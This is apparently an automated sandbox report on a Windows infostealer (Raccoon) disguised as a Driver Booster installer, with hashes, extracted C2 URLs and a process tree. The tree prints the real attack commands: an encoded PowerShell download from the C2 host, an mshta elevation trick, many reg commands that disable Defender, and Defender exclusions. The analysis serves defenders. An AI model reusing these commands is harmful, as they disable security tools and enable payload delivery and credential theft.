Analysis
-
max time kernel
147s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
14-10-2022 22:06
Static task
static1
Behavioral task
behavioral1
Sample
0b1c78db1d6debc91c59c0d7dfe9dd31.exe
Resource
win7-20220812-en
General
-
Target
0b1c78db1d6debc91c59c0d7dfe9dd31.exe
-
Size
30.1MB
-
MD5
0b1c78db1d6debc91c59c0d7dfe9dd31
-
SHA1
98575e24bfe6a11c678de4f9ebc55453710fcc75
-
SHA256
a027d527bf8e2d3682ee39f12379d113bc7d28193d36b2c448712e5c8009ff52
-
SHA512
2d9c226b5dcbd2c3e54816c374a46e4d9e04b22ecde3c8a231cd7b55ae7183134a3b5a54af0dc05e774ba9b25f444609fc43ec0bb526a619c5297489b55eff02
-
SSDEEP
786432:TZ2NuqrYwxyy8BXmRAw/5Vi5U21eNJvkH:TANua5xd89mmwQHoU
Malware Config
Extracted
http://31.42.177.171/hfile.bin
Extracted
raccoon
9b19cf60d9bdf65b8a2495aa965456c3
http://77.91.123.97/
Signatures
-
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 280 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
Processes:
0b1c78db1d6debc91c59c0d7dfe9dd31.tmpDriver.Booster.10.0.0.31.exeDriver.Booster.10.0.0.31.tmp7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exerundll32.exerundll32.exepid process 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp 1840 Driver.Booster.10.0.0.31.exe 1340 Driver.Booster.10.0.0.31.tmp 1480 7za.exe 1140 7za.exe 1436 7za.exe 520 7za.exe 1744 7za.exe 2024 7za.exe 1100 7za.exe 1020 7za.exe 616 7za.exe 804 rundll32.exe 1336 rundll32.exe -
Loads dropped DLL 29 IoCs
Processes:
0b1c78db1d6debc91c59c0d7dfe9dd31.exe0b1c78db1d6debc91c59c0d7dfe9dd31.tmpDriver.Booster.10.0.0.31.exeDriver.Booster.10.0.0.31.tmpcmd.execmd.exerundll32.exerundll32.exeWerFault.exepid process 1428 0b1c78db1d6debc91c59c0d7dfe9dd31.exe 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp 1840 Driver.Booster.10.0.0.31.exe 1340 Driver.Booster.10.0.0.31.tmp 1340 Driver.Booster.10.0.0.31.tmp 1340 Driver.Booster.10.0.0.31.tmp 1340 Driver.Booster.10.0.0.31.tmp 1340 Driver.Booster.10.0.0.31.tmp 1828 cmd.exe 1828 cmd.exe 1836 cmd.exe 1836 cmd.exe 1836 cmd.exe 1836 cmd.exe 1836 cmd.exe 1836 cmd.exe 1836 cmd.exe 1836 cmd.exe 1836 cmd.exe 804 rundll32.exe 1336 rundll32.exe 1336 rundll32.exe 1336 rundll32.exe 948 WerFault.exe 948 WerFault.exe 948 WerFault.exe 948 WerFault.exe 948 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
rundll32.exedescription pid process target process PID 804 set thread context of 1336 804 rundll32.exe rundll32.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\PROGRA~3\SURFAC~1\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\PROGRA~3\SURFAC~1\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\PROGRA~3\SURFAC~1\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\PROGRA~3\SURFAC~1\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 948 1336 WerFault.exe rundll32.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
0b1c78db1d6debc91c59c0d7dfe9dd31.tmpDriver.Booster.10.0.0.31.tmppowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp 1340 Driver.Booster.10.0.0.31.tmp 280 powershell.exe 1220 powershell.exe 280 powershell.exe 1540 powershell.exe 904 powershell.exe 1748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.exepowershell.exedescription pid process Token: SeDebugPrivilege 280 powershell.exe Token: SeDebugPrivilege 1220 powershell.exe Token: SeDebugPrivilege 280 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeDebugPrivilege 804 rundll32.exe Token: SeDebugPrivilege 1748 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
0b1c78db1d6debc91c59c0d7dfe9dd31.tmppid process 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0b1c78db1d6debc91c59c0d7dfe9dd31.exe0b1c78db1d6debc91c59c0d7dfe9dd31.tmpDriver.Booster.10.0.0.31.execmd.exeWScript.execmd.exemshta.execmd.exedescription pid process target process PID 1428 wrote to memory of 860 1428 0b1c78db1d6debc91c59c0d7dfe9dd31.exe 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp PID 1428 wrote to memory of 860 1428 0b1c78db1d6debc91c59c0d7dfe9dd31.exe 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp PID 1428 wrote to memory of 860 1428 0b1c78db1d6debc91c59c0d7dfe9dd31.exe 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp PID 1428 wrote to memory of 860 1428 0b1c78db1d6debc91c59c0d7dfe9dd31.exe 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp PID 1428 wrote to memory of 860 1428 0b1c78db1d6debc91c59c0d7dfe9dd31.exe 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp PID 1428 wrote to memory of 860 1428 0b1c78db1d6debc91c59c0d7dfe9dd31.exe 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp PID 1428 wrote to memory of 860 1428 0b1c78db1d6debc91c59c0d7dfe9dd31.exe 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp PID 860 wrote to memory of 1840 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp Driver.Booster.10.0.0.31.exe PID 860 wrote to memory of 1840 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp Driver.Booster.10.0.0.31.exe PID 860 wrote to memory of 1840 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp Driver.Booster.10.0.0.31.exe PID 860 wrote to memory of 1840 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp Driver.Booster.10.0.0.31.exe PID 860 wrote to memory of 1840 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp Driver.Booster.10.0.0.31.exe PID 860 wrote to memory of 1840 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp Driver.Booster.10.0.0.31.exe PID 860 wrote to memory of 1840 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp Driver.Booster.10.0.0.31.exe PID 860 wrote to memory of 1828 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp cmd.exe PID 860 wrote to memory of 1828 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp cmd.exe PID 860 wrote to memory of 1828 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp cmd.exe PID 860 wrote to memory of 1828 860 0b1c78db1d6debc91c59c0d7dfe9dd31.tmp cmd.exe PID 1840 wrote to memory of 1340 1840 Driver.Booster.10.0.0.31.exe Driver.Booster.10.0.0.31.tmp PID 1840 wrote to memory of 1340 1840 Driver.Booster.10.0.0.31.exe Driver.Booster.10.0.0.31.tmp PID 1840 wrote to memory of 1340 1840 Driver.Booster.10.0.0.31.exe Driver.Booster.10.0.0.31.tmp PID 1840 wrote to memory of 1340 1840 Driver.Booster.10.0.0.31.exe Driver.Booster.10.0.0.31.tmp PID 1840 wrote to memory of 1340 1840 Driver.Booster.10.0.0.31.exe Driver.Booster.10.0.0.31.tmp PID 1840 wrote to memory of 1340 1840 Driver.Booster.10.0.0.31.exe Driver.Booster.10.0.0.31.tmp PID 1840 wrote to memory of 1340 1840 Driver.Booster.10.0.0.31.exe Driver.Booster.10.0.0.31.tmp PID 1828 wrote to memory of 280 1828 cmd.exe powershell.exe PID 1828 wrote to memory of 280 1828 cmd.exe powershell.exe PID 1828 wrote to memory of 280 1828 cmd.exe powershell.exe PID 1828 wrote to memory of 280 1828 cmd.exe powershell.exe PID 1828 wrote to memory of 1480 1828 cmd.exe 7za.exe PID 1828 wrote to memory of 1480 1828 cmd.exe 7za.exe PID 1828 wrote to memory of 1480 1828 cmd.exe 7za.exe PID 1828 wrote to memory of 1480 1828 cmd.exe 7za.exe PID 1828 wrote to memory of 1960 1828 cmd.exe WScript.exe PID 1828 wrote to memory of 1960 1828 cmd.exe WScript.exe PID 1828 wrote to memory of 1960 1828 cmd.exe WScript.exe PID 1828 wrote to memory of 1960 1828 cmd.exe WScript.exe PID 1960 wrote to memory of 1744 1960 WScript.exe cmd.exe PID 1960 wrote to memory of 1744 1960 WScript.exe cmd.exe PID 1960 wrote to memory of 1744 1960 WScript.exe cmd.exe PID 1960 wrote to memory of 1744 1960 WScript.exe cmd.exe PID 1744 wrote to memory of 1660 1744 cmd.exe mshta.exe PID 1744 wrote to memory of 1660 1744 cmd.exe mshta.exe PID 1744 wrote to memory of 1660 1744 cmd.exe mshta.exe PID 1744 wrote to memory of 1660 1744 cmd.exe mshta.exe PID 1660 wrote to memory of 1748 1660 mshta.exe cmd.exe PID 1660 wrote to memory of 1748 1660 mshta.exe cmd.exe PID 1660 wrote to memory of 1748 1660 mshta.exe cmd.exe PID 1660 wrote to memory of 1748 1660 mshta.exe cmd.exe PID 1748 wrote to memory of 1420 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1420 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1420 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1420 1748 cmd.exe reg.exe PID 1748 wrote to memory of 2044 1748 cmd.exe reg.exe PID 1748 wrote to memory of 2044 1748 cmd.exe reg.exe PID 1748 wrote to memory of 2044 1748 cmd.exe reg.exe PID 1748 wrote to memory of 2044 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1892 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1892 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1892 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1892 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1016 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1016 1748 cmd.exe reg.exe PID 1748 wrote to memory of 1016 1748 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0b1c78db1d6debc91c59c0d7dfe9dd31.exe"C:\Users\Admin\AppData\Local\Temp\0b1c78db1d6debc91c59c0d7dfe9dd31.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-DQCVK.tmp\0b1c78db1d6debc91c59c0d7dfe9dd31.tmp"C:\Users\Admin\AppData\Local\Temp\is-DQCVK.tmp\0b1c78db1d6debc91c59c0d7dfe9dd31.tmp" /SL5="$70120,30539716,1005056,C:\Users\Admin\AppData\Local\Temp\0b1c78db1d6debc91c59c0d7dfe9dd31.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-K5ESQ.tmp\Driver.Booster.10.0.0.31.exe"C:\Users\Admin\AppData\Local\Temp\is-K5ESQ.tmp\Driver.Booster.10.0.0.31.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-T53UA.tmp\Driver.Booster.10.0.0.31.tmp"C:\Users\Admin\AppData\Local\Temp\is-T53UA.tmp\Driver.Booster.10.0.0.31.tmp" /SL5="$101AE,28925413,361472,C:\Users\Admin\AppData\Local\Temp\is-K5ESQ.tmp\Driver.Booster.10.0.0.31.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\SurfaceReduction\main.bat" "3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAzADEALgA0ADIALgAxADcANwAuADEANwAxAC8AaABmAGkAbABlAC4AYgBpAG4AJwAsACAAJwBoAGYAaQBsAGUALgBiAGkAbgAnACkA4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\SurfaceReduction\7za.exe7za.exe x -y -p10619mlgrAGP7211mlgrAGP24753 "*.zip"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\SurfaceReduction\CurrentControlSet003.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\SurfaceReduction\CurrentControlSet001_obf.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c C:\PROGRA~3\SURFAC~1\CURREN~1.BAT ::","","runas",0)(window.close)6⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\PROGRA~3\SURFAC~1\CURREN~1.BAT ::7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 1 /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f8⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f8⤵
- Modifies Windows Defender notification settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath '"C:\ProgramData\'"8⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\cache'"8⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\LocalLow\'"8⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\'"8⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\SurfaceReduction\compil23_obf.bat" "5⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\mode.commode 65,106⤵
-
C:\ProgramData\SurfaceReduction\7za.exe7za.exe e file.zip -p12324ETQMytgST5761ETQMytgST383 -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\SurfaceReduction\7za.exe7za.exe e extracted/file_7.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\SurfaceReduction\7za.exe7za.exe e extracted/file_6.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\SurfaceReduction\7za.exe7za.exe e extracted/file_5.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\SurfaceReduction\7za.exe7za.exe e extracted/file_4.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\SurfaceReduction\7za.exe7za.exe e extracted/file_3.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\SurfaceReduction\7za.exe7za.exe e extracted/file_2.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\SurfaceReduction\7za.exe7za.exe e extracted/file_1.zip -oextracted6⤵
- Executes dropped EXE
-
C:\ProgramData\SurfaceReduction\rundll32.exe"rundll32.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\SurfaceReduction\rundll32.exeC:\ProgramData\SurfaceReduction\rundll32.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 8208⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\SurfaceReduction\CurrentControlSet002.bat" "5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 56⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c rd /q /s "C:\ProgramData\SurfaceReduction\"6⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\7za.exeFilesize
572KB
MD5c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\SurfaceReduction\CurrentControlSet001_obf.batFilesize
178KB
MD568a2dd2bf5f37cad172bd8e418a0d528
SHA1c1bedd8aef01c5a14c5ba7bca87f48bac1be39e6
SHA256f2de65566a6da79938cc1be78f0e88e07c76bad392c7fc2da2f2d42e7c726e11
SHA512c8821676dae149a16a8d9d38fc4067673926677ab985744bef51d0fcbedea2ee650d0b6a0b252906d6176f9637c82439a9199ec5d89d3901315be0c1638675b7
-
C:\ProgramData\SurfaceReduction\CurrentControlSet002.batFilesize
186B
MD5d62adedd663f3bc437e8c234bd818fe8
SHA1785984b360807df58434723f588a5dfc94b5e7a1
SHA2566cbc7c7a5ca124d27f3bf0f407fe8e1af5009313cb2f31c6de320b2549857333
SHA5124b1dc05aee7621570466aadf4bdc0b866fa0e386615eae92a4b382af83c35c6af97276eab6a4f7a51a783dbfb4b61cf3139eb007080f3a13a13a3260e75227ea
-
C:\ProgramData\SurfaceReduction\CurrentControlSet003.vbsFilesize
33KB
MD5b63b963b242f6958dbe26c602ef68165
SHA1e6bfd3d8a7dabe4d7bddb2cc3074faec9eed3bf5
SHA256016256b7b4a0dce76b245df046105fade5a426f0721ee7b921b05d1177ee1da9
SHA5125f4a0d442169691e41ec84efc03832b7820f0e7ebed5a5f82d79de4df4e7244cc723080c227551c65a8fe22d71d078567f14b3e1b3d627b6aba2f864ace92f30
-
C:\ProgramData\SurfaceReduction\compil23_obf.batFilesize
476B
MD5d596002650fd35e971e9d8ea108f8569
SHA1f8461cace9155cc50583dcae7b7e6992f0cf75a5
SHA256448d25be88c04f47b095781581865fa27e1223a679a27c7e9dc50978db0d7c59
SHA512e3697f7f13c256fe93722348e9e430e9d6088aed97b3a8afde700ce804b23012971b415662c0cba71f92d24cb03d1802c4fa495453586fceb189c11127a81db2
-
C:\ProgramData\SurfaceReduction\extracted\ANTIAV~1.DATFilesize
2.1MB
MD5dc5c2895120623877b99b35510099a2a
SHA1cf63c28ac6e9dbf9f775bf4dd4ff4bcbd900ed0b
SHA256e6f2be0e52455cf811f3ccb8652e1c32017030caaffbfb76c3bf63cd51f3a496
